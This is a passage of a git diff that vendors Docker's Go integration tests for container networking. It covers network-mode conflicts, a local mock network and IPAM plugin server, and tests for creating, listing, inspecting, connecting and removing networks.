executes a docker command that is supposed to fail and returns +// the output, the exit code. If the command returns a Nil error, it will fail and +// stop the tests. +func dockerCmdWithFail(c *check.C, args ...string) (string, int) { + out, status, err := dockerCmdWithError(args...) 
+ c.Assert(err, check.NotNil, check.Commentf("%v", out)) + return out, status +} + +func (s *DockerSuite) TestNetHostnameWithNetHost(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) +} + +func (s *DockerSuite) TestNetHostname(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-h=name", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmd(c, "run", "-h=name", "--net=bridge", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmd(c, "run", "-h=name", "--net=none", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmdWithFail(c, "run", "-h=name", "--net=container:other", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps") + c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:") + + out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps") + c.Assert(out, checker.Contains, "network weird not found") +} + +func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--link=zip:zap", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestConflictContainerNetworkHostAndLinks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmdWithFail(c, "run", "--net=host", "--link=zip:zap", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestConflictNetworkModeNetHostAndOptions(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + 
out, _ := dockerCmdWithFail(c, "run", "--net=host", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error()) +} + +func (s *DockerSuite) TestConflictNetworkModeAndOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--dns=8.8.8.8", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkAndDNS.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--add-host=name:8.8.8.8", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHosts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-P", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-p", "8080", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--expose", "8000-9000", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkExposePorts.Error()) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go new file mode 100644 index 0000000000..97f204ab47 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go @@ -0,0 +1,1791 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types" + 
"github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork/driverapi" + remoteapi "github.com/docker/libnetwork/drivers/remote/api" + "github.com/docker/libnetwork/ipamapi" + remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/docker/libnetwork/netlabel" + "github.com/go-check/check" + "github.com/vishvananda/netlink" +) + +const dummyNetworkDriver = "dummy-network-driver" +const dummyIPAMDriver = "dummy-ipam-driver" + +var remoteDriverNetworkRequest remoteapi.CreateNetworkRequest + +func init() { + check.Suite(&DockerNetworkSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerNetworkSuite struct { + server *httptest.Server + ds *DockerSuite + d *Daemon +} + +func (s *DockerNetworkSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) +} + +func (s *DockerNetworkSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerNetworkSuite) SetUpSuite(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server")) + setupRemoteNetworkDrivers(c, mux, s.server.URL, dummyNetworkDriver, dummyIPAMDriver) +} + +func setupRemoteNetworkDrivers(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) { + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType) + }) + + // Network driver implementation + mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + 
fmt.Fprintf(w, `{"Scope":"local"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + + veth := &netlink.Veth{ + LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"} + if err := netlink.LinkAdd(veth); err != nil { + fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`) + } else { + fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if link, err := 
netlink.LinkByName("cnt0"); err == nil { + netlink.LinkDel(link) + } + fmt.Fprintf(w, "null") + }) + + // IPAM Driver implementation + var ( + poolRequest remoteipam.RequestPoolRequest + poolReleaseReq remoteipam.ReleasePoolRequest + addressRequest remoteipam.RequestAddressRequest + addressReleaseReq remoteipam.ReleaseAddressRequest + lAS = "localAS" + gAS = "globalAS" + pool = "172.28.0.0/16" + poolID = lAS + "/" + pool + gw = "172.28.255.254/16" + ) + + mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS { + fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`) + } else if poolRequest.Pool != "" && poolRequest.Pool != pool { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`) + } else { + fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now querying on the expected pool id + if 
addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressRequest.Address != "" { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`) + } else { + fmt.Fprintf(w, `{"Address":"`+gw+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected address from the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressReleaseReq.Address != gw { + fmt.Fprintf(w, `{"Error":"unknown address"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected poolid + if poolReleaseReq.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv) + err = ioutil.WriteFile(fileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) + + ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv) + err = ioutil.WriteFile(ipamFileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) +} + +func (s *DockerNetworkSuite) TearDownSuite(c 
*check.C) { + if s.server == nil { + return + } + + s.server.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func assertNwIsAvailable(c *check.C, name string) { + if !isNwPresent(c, name) { + c.Fatalf("Network %s not found in network ls o/p", name) + } +} + +func assertNwNotAvailable(c *check.C, name string) { + if isNwPresent(c, name) { + c.Fatalf("Found network %s in network ls o/p", name) + } +} + +func isNwPresent(c *check.C, name string) bool { + out, _ := dockerCmd(c, "network", "ls") + lines := strings.Split(out, "\n") + for i := 1; i < len(lines)-1; i++ { + netFields := strings.Fields(lines[i]) + if netFields[1] == name { + return true + } + } + return false +} + +// assertNwList checks network list retrieved with ls command +// equals to expected network list +// note: out should be `network ls [option]` result +func assertNwList(c *check.C, out string, expectNws []string) { + lines := strings.Split(out, "\n") + var nwList []string + for _, line := range lines[1 : len(lines)-1] { + netFields := strings.Fields(line) + // wrap all network name in nwList + nwList = append(nwList, netFields[1]) + } + + // network ls should contains all expected networks + c.Assert(nwList, checker.DeepEquals, expectNws) +} + +func getNwResource(c *check.C, name string) *types.NetworkResource { + out, _ := dockerCmd(c, "network", "inspect", name) + nr := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &nr) + c.Assert(err, check.IsNil) + return &nr[0] +} + +func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) { + defaults := []string{"bridge", "host", "none"} + for _, nn := range defaults { + assertNwIsAvailable(c, nn) + } +} + +func (s *DockerSuite) TestNetworkLsFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"bridge", "host", "none"} + var names 
[]string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + + config := `{ + "networksFormat": "{{ .Name }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "--config", d, "network", "ls") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"bridge default", "host default", "none default"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) { + predefined := []string{"bridge", "host", "none", "default"} + for _, net := range predefined { + // predefined networks can't be created again + out, _, err := dockerCmdWithError("network", "create", net) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) { + dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") + assertNwIsAvailable(c, "testbind") + + out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + out, _ = dockerCmd(c, "ps") + c.Assert(out, checker.Contains, "192.168.10.1:5000->5000/tcp") +} + +func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) { + predefined := []string{"bridge", "host", "none", "default"} + for _, net := range 
predefined { + // predefined networks can't be removed + out, _, err := dockerCmdWithError("network", "rm", net) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) { + testNet := "testnet1" + testLabel := "foo" + testValue := "bar" + out, _ := dockerCmd(c, "network", "create", "dev") + defer func() { + dockerCmd(c, "network", "rm", "dev") + dockerCmd(c, "network", "rm", testNet) + }() + networkID := strings.TrimSpace(out) + + // filter with partial ID + // only show 'dev' network + out, _ = dockerCmd(c, "network", "ls", "-f", "id="+networkID[0:5]) + assertNwList(c, out, []string{"dev"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "name=dge") + assertNwList(c, out, []string{"bridge"}) + + // only show built-in network (bridge, none, host) + out, _ = dockerCmd(c, "network", "ls", "-f", "type=builtin") + assertNwList(c, out, []string{"bridge", "host", "none"}) + + // only show custom networks (dev) + out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom") + assertNwList(c, out, []string{"dev"}) + + // show all networks with filter + // it should be equivalent of ls without option + out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom", "-f", "type=builtin") + assertNwList(c, out, []string{"bridge", "dev", "host", "none"}) + + out, _ = dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet) + assertNwIsAvailable(c, testNet) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel) + assertNwList(c, out, []string{testNet}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel+"="+testValue) + assertNwList(c, out, []string{testNet}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label=nonexistent") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=null") + assertNwList(c, out, 
[]string{"none"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=host") + assertNwList(c, out, []string{"host"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=bridge") + assertNwList(c, out, []string{"bridge", "dev", testNet}) +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateDelete(c *check.C) { + dockerCmd(c, "network", "create", "test") + assertNwIsAvailable(c, "test") + + dockerCmd(c, "network", "rm", "test") + assertNwNotAvailable(c, "test") +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateLabel(c *check.C) { + testNet := "testnetcreatelabel" + testLabel := "foo" + testValue := "bar" + + dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet) + assertNwIsAvailable(c, testNet) + + out, _, err := dockerCmdWithError("network", "inspect", "--format={{ .Labels."+testLabel+" }}", testNet) + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, testValue) + + dockerCmd(c, "network", "rm", testNet) + assertNwNotAvailable(c, testNet) +} + +func (s *DockerSuite) TestDockerNetworkDeleteNotExists(c *check.C) { + out, _, err := dockerCmdWithError("network", "rm", "test") + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) +} + +func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) { + dockerCmd(c, "network", "create", "testDelMulti0") + assertNwIsAvailable(c, "testDelMulti0") + dockerCmd(c, "network", "create", "testDelMulti1") + assertNwIsAvailable(c, "testDelMulti1") + dockerCmd(c, "network", "create", "testDelMulti2") + assertNwIsAvailable(c, "testDelMulti2") + out, _ := dockerCmd(c, "run", "-d", "--net", "testDelMulti2", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + // delete three networks at the same time, since testDelMulti2 + // contains active container, its deletion should fail. 
+ out, _, err := dockerCmdWithError("network", "rm", "testDelMulti0", "testDelMulti1", "testDelMulti2") + // err should not be nil due to deleting testDelMulti2 failed. + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // testDelMulti2 should fail due to network has active endpoints + c.Assert(out, checker.Contains, "has active endpoints") + assertNwNotAvailable(c, "testDelMulti0") + assertNwNotAvailable(c, "testDelMulti1") + // testDelMulti2 can't be deleted, so it should exist + assertNwIsAvailable(c, "testDelMulti2") +} + +func (s *DockerSuite) TestDockerNetworkInspect(c *check.C) { + out, _ := dockerCmd(c, "network", "inspect", "host") + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) + + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Name }}", "host") + c.Assert(strings.TrimSpace(out), check.Equals, "host") +} + +func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) { + out, _ := dockerCmd(c, "network", "create", "test2") + networkID := strings.TrimSpace(out) + assertNwIsAvailable(c, "test2") + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Id }}", "test2") + c.Assert(strings.TrimSpace(out), check.Equals, networkID) + + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .ID }}", "test2") + c.Assert(strings.TrimSpace(out), check.Equals, networkID) +} + +func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) { + result := dockerCmdWithResult("network", "inspect", "host", "none") + c.Assert(result, icmd.Matches, icmd.Success) + + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 2) + + // Should print an error, return an exitCode 1 *but* should print the host network + result = dockerCmdWithResult("network", "inspect", "host", 
"nonexistent") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "host", + }) + + networkResources = []types.NetworkResource{} + err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(networkResources, checker.HasLen, 1) + + // Should print an error and return an exitCode, nothing else + result = dockerCmdWithResult("network", "inspect", "nonexistent") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "[]", + }) +} + +func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { + dockerCmd(c, "network", "create", "brNetForInspect") + assertNwIsAvailable(c, "brNetForInspect") + defer func() { + dockerCmd(c, "network", "rm", "brNetForInspect") + assertNwNotAvailable(c, "brNetForInspect") + }() + + out, _ := dockerCmd(c, "run", "-d", "--name", "testNetInspect1", "--net", "brNetForInspect", "busybox", "top") + c.Assert(waitRun("testNetInspect1"), check.IsNil) + containerID := strings.TrimSpace(out) + defer func() { + // we don't stop container by name, because we'll rename it later + dockerCmd(c, "stop", containerID) + }() + + out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) + container, ok := networkResources[0].Containers[containerID] + c.Assert(ok, checker.True) + c.Assert(container.Name, checker.Equals, "testNetInspect1") + + // rename container and check docker inspect output update + newName := "HappyNewName" + dockerCmd(c, "rename", "testNetInspect1", newName) + + // check whether network inspect works properly + out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") + newNetRes := []types.NetworkResource{} + err = json.Unmarshal([]byte(out), &newNetRes) + c.Assert(err, check.IsNil) + 
c.Assert(newNetRes, checker.HasLen, 1) + container1, ok := newNetRes[0].Containers[containerID] + c.Assert(ok, checker.True) + c.Assert(container1.Name, checker.Equals, newName) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) { + dockerCmd(c, "network", "create", "test") + assertNwIsAvailable(c, "test") + nr := getNwResource(c, "test") + + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run a container + out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + c.Assert(waitRun("test"), check.IsNil) + containerID := strings.TrimSpace(out) + + // connect the container to the test network + dockerCmd(c, "network", "connect", "test", containerID) + + // inspect the network to make sure container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], check.NotNil) + + // check if container IP matches network inspect + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, check.IsNil) + containerIP := findContainerIP(c, "test", "test") + c.Assert(ip.String(), checker.Equals, containerIP) + + // disconnect container from the network + dockerCmd(c, "network", "disconnect", "test", containerID) + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run another container + out, _ = dockerCmd(c, "run", "-d", "--net", "test", "--name", "test2", "busybox", "top") + c.Assert(waitRun("test2"), check.IsNil) + containerID = strings.TrimSpace(out) + + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 1) + + // force disconnect the container to the test network + dockerCmd(c, "network", "disconnect", "-f", "test", containerID) + + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + 
c.Assert(len(nr.Containers), checker.Equals, 0) + + dockerCmd(c, "network", "rm", "test") + assertNwNotAvailable(c, "test") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { + // test0 bridge network + dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1") + assertNwIsAvailable(c, "test1") + + // test2 bridge network does not overlap + dockerCmd(c, "network", "create", "--subnet=192.169.0.0/16", "test2") + assertNwIsAvailable(c, "test2") + + // for networks w/o ipam specified, docker will choose proper non-overlapping subnets + dockerCmd(c, "network", "create", "test3") + assertNwIsAvailable(c, "test3") + dockerCmd(c, "network", "create", "test4") + assertNwIsAvailable(c, "test4") + dockerCmd(c, "network", "create", "test5") + assertNwIsAvailable(c, "test5") + + // test network with multiple subnets + // bridge network doesn't support multiple subnets. hence, use a dummy driver that supports + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16", "test6") + assertNwIsAvailable(c, "test6") + + // test network with multiple subnets with valid ipam combinations + // also check same subnet across networks when the driver supports it. 
+ dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, + "--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16", + "--gateway=192.168.0.100", "--gateway=192.170.0.100", + "--ip-range=192.168.1.0/24", + "--aux-address", "a=192.168.1.5", "--aux-address", "b=192.168.1.6", + "--aux-address", "c=192.170.1.5", "--aux-address", "d=192.170.1.6", + "test7") + assertNwIsAvailable(c, "test7") + + // cleanup + for i := 1; i < 8; i++ { + dockerCmd(c, "network", "rm", fmt.Sprintf("test%d", i)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { + // Create a bridge network using custom ipam driver + dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0") + assertNwIsAvailable(c, "br0") + + // Verify expected network ipam fields are there + nr := getNetworkResource(c, "br0") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.IPAM.Driver, checker.Equals, dummyIPAMDriver) + + // remove network and exercise remote ipam driver + dockerCmd(c, "network", "rm", "br0") + assertNwNotAvailable(c, "br0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { + // Create a bridge network using custom ipam driver and options + dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0") + assertNwIsAvailable(c, "br0") + + // Verify expected network ipam options + nr := getNetworkResource(c, "br0") + opts := nr.IPAM.Options + c.Assert(opts["opt1"], checker.Equals, "drv1") + c.Assert(opts["opt2"], checker.Equals, "drv2") +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) { + nr := getNetworkResource(c, "none") + c.Assert(nr.Driver, checker.Equals, "null") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 0) + + nr = 
getNetworkResource(c, "host") + c.Assert(nr.Driver, checker.Equals, "host") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 0) + + nr = getNetworkResource(c, "bridge") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil) + c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomUnspecified(c *check.C) { + // if unspecified, network subnet will be selected from inside preferred pool + dockerCmd(c, "network", "create", "test01") + assertNwIsAvailable(c, "test01") + + nr := getNetworkResource(c, "test01") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil) + c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil) + + dockerCmd(c, "network", "rm", "test01") + assertNwNotAvailable(c, "test01") +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C) { + dockerCmd(c, "network", "create", "--driver=bridge", "--ipv6", "--subnet=fd80:24e2:f998:72d6::/64", "--subnet=172.28.0.0/16", "--ip-range=172.28.5.0/24", 